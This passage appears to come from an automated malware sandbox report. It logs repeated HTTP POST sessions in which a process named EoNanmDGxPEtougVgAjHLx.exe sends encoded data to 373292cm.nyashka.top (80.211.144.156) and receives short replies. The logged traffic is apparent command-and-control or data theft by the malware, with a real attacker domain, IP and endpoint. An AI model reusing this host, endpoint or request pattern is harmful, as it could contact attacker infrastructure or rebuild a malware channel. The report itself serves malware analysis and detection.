                                    Data Ascii: _T\RQGT][_ZQY^XVWP][WQSZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-;0/@5>( 3=X==^+.(#,#W4/<_+^7=]8&F$.Y/
                                    Aug 25, 2024 15:43:49.960719109 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:50.090001106 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 1c 29 26 2a 58 31 38 24 51 33 30 3e 56 3d 3e 23 5b 2a 2d 29 14 24 06 22 00 26 00 0a 50 24 15 21 5d 3f 3d 36 57 25 3c 33 13 2d 24 2b 5d 0c 13 21 04 21 39 2a 13 31 2c 33 05 3e 06 23 5b 22 5a 22 5b 3c 2a 22 0d 3f 01 24 5e 28 17 2b 5a 3f 2a 31 0e 2f 06 36 05 39 30 08 1c 37 3e 2b 52 0d 11 27 0d 3c 03 00 0e 29 07 2b 5d 21 38 2c 03 26 2d 22 1c 32 32 07 0d 26 39 38 11 25 1c 35 1f 33 31 21 57 26 15 26 5b 32 01 29 51 35 18 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &)&*X18$Q30>V=>#[*-)$"&P$!]?=6W%<3-$+]!!9*1,3>#["Z"[<*"?$^(+Z?*1/6907>+R'<)+]!8,&-"22&98%531!W&&[2)Q5#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    22 | 192.168.2.6 | 49746 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:49.247225046 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:49.591769934 CEST | 2516 | OUT | Data Raw: 5f 54 59 57 51 40 54 51 5b 5f 5a 51 59 51 58 50 57 5c 5d 5a 57 5a 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _TYWQ@TQ[_ZQYQXPW\]ZWZSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^8?5840) <X*)>#",Q 1Q*9 9];>&F$.Y/=
                                    Aug 25, 2024 15:43:50.006643057 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:50.142051935 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    23 | 192.168.2.6 | 49747 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:50.299071074 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:50.654715061 CEST | 2516 | OUT | Data Raw: 5a 51 5c 5e 51 45 51 5b 5b 5f 5a 51 59 55 58 54 57 5e 5d 52 57 5d 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZQ\^QEQ[[_ZQYUXTW^]RW]S]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.X;@!.' !]*-<X9[(#X 0#18P(9? %_8&F$.Y/-
                                    Aug 25, 2024 15:43:50.979058981 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:51.178493023 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:50 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    24 | 192.168.2.6 | 49748 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:51.315808058 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:51.670933008 CEST | 2516 | OUT | Data Raw: 5f 5d 59 53 54 47 51 5b 5b 5f 5a 51 59 5e 58 50 57 5e 5d 5c 57 5c 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _]YSTGQ[[_ZQY^XPW^]\W\S[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.^/3#5>+#V">.,<=_?47 +_+_7#!^..&F$.Y/
                                    Aug 25, 2024 15:43:52.012188911 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:52.151779890 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:51 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    25 | 192.168.2.6 | 49749 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:52.429029942 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:52.791280985 CEST | 2516 | OUT | Data Raw: 5f 56 5c 52 54 46 54 58 5b 5f 5a 51 59 53 58 51 57 51 5d 52 57 5a 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _V\RTFTX[_ZQYSXQWQ]RWZSZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.].#"- X4Z>>,(=5^<>84'W41,P*:?Y V9,>&F$.Y/5
                                    Aug 25, 2024 15:43:53.111701012 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:53.308345079 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    26 | 192.168.2.6 | 49750 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:53.437330961 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:53.794877052 CEST | 2516 | OUT | Data Raw: 5f 5d 5c 50 54 47 51 5e 5b 5f 5a 51 59 51 58 5f 57 5d 5d 58 57 5e 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _]\PTGQ^[_ZQYQX_W]]XW^ST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.X,6-;# *=+<![?/]7?V41(45\.>&F$.Y/=
                                    Aug 25, 2024 15:43:54.109132051 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:54.304596901 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    27 | 192.168.2.6 | 49751 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:54.439421892 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:54.794907093 CEST | 2516 | OUT | Data Raw: 5f 5c 59 54 51 45 54 5c 5b 5f 5a 51 59 53 58 56 57 59 5d 58 57 5b 53 5a 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\YTQET\[_ZQYSXVWY]XW[SZ\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-;0,"-" "=<>]?Y7,4!1,+84=.>&F$.Y/5
                                    Aug 25, 2024 15:43:55.121423960 CEST | 25 | IN | HTTP/1.1 100 Continue


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    28 | 192.168.2.6 | 49752 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:55.192445040 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1828
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:55.544792891 CEST | 1828 | OUT | Data Raw: 5a 57 59 50 51 44 54 51 5b 5f 5a 51 59 57 58 55 57 50 5d 52 57 5a 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZWYPQDTQ[_ZQYWXUWP]RWZS_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\;85>;7))=/+.)]+ / "<R('#01Y/&F$.Y/-
                                    Aug 25, 2024 15:43:55.860856056 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:55.995625019 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 25 0f 28 35 2e 59 25 15 05 0d 24 33 26 52 29 5b 3c 02 3d 13 08 07 24 38 21 5e 26 2e 02 13 24 2b 29 5c 28 3e 04 19 32 11 3b 58 2d 34 2b 5d 0c 13 22 1b 34 2a 22 5d 24 3f 2f 03 3e 3b 2f 5b 22 02 29 05 28 2a 03 54 28 11 38 58 3c 39 23 59 2b 39 36 11 38 01 2a 03 39 0e 04 1c 34 3e 2b 52 0d 11 27 0c 29 3d 0b 52 29 2e 1e 07 23 38 30 03 33 2d 0c 50 31 32 22 54 26 39 0e 5c 32 31 25 51 30 22 35 1f 31 2b 0c 5e 32 01 0f 50 21 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: %(5.Y%$3&R)[<=$8!^&.$+)\(>2;X-4+]"4*"]$?/>;/[")(*T(8X<9#Y+968*94>+R')=R).#803-P12"T&9\21%Q0"51+^2P!"#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    29 | 192.168.2.6 | 49753 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:55.465590000 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:55.810698986 CEST | 2516 | OUT | Data Raw: 5f 53 5c 5f 51 45 54 5f 5b 5f 5a 51 59 56 58 55 57 50 5d 5b 57 58 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\_QET_[_ZQYVXUWP][WXS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.\/3?@5 V:>4>.-Z<-#<#0<:8 >,&F$.Y/!
                                    Aug 25, 2024 15:43:56.145257950 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:56.343777895 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    30 | 192.168.2.6 | 49755 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:56.478168964 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:56.826076031 CEST | 2516 | OUT | Data Raw: 5a 52 59 55 51 42 54 59 5b 5f 5a 51 59 56 58 50 57 5d 5d 5f 57 50 53 5e 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZRYUQBTY[_ZQYVXPW]]_WPS^\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,0<![ V=+-_("+#Z",#P7W0W<#^7#%/.&F$.Y/!
                                    Aug 25, 2024 15:43:57.210558891 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:57.343698978 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    31 | 192.168.2.6 | 49756 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:57.550467014 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:57.910370111 CEST | 2516 | OUT | Data Raw: 5f 56 59 57 51 42 51 5c 5b 5f 5a 51 59 5e 58 51 57 5a 5d 58 57 59 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _VYWQBQ\[_ZQY^XQWZ]XWYS]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.,'@6>(\4V)Y>.+(*).7 ?7V78R(+\73:..&F$.Y/
                                    Aug 25, 2024 15:43:58.232053041 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:58.363725901 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    32 | 192.168.2.6 | 49757 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:58.491348028 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:59.159846067 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:59.287777901 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    33 | 192.168.2.6 | 49758 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:59.408261061 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:00.082312107 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:00.215471029 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    34 | 192.168.2.6 | 49759 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:00.690026045 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    35 | 192.168.2.6 | 49760 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:01.004389048 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:01.706126928 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:01.950906038 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    36 | 192.168.2.6 | 49761 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:01.124092102 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:01.813946962 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:01.941901922 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    37 | 192.168.2.6 | 49762 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:02.062608957 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:02.745142937 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:02.943983078 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    38 | 192.168.2.6 | 49763 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:03.237884045 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
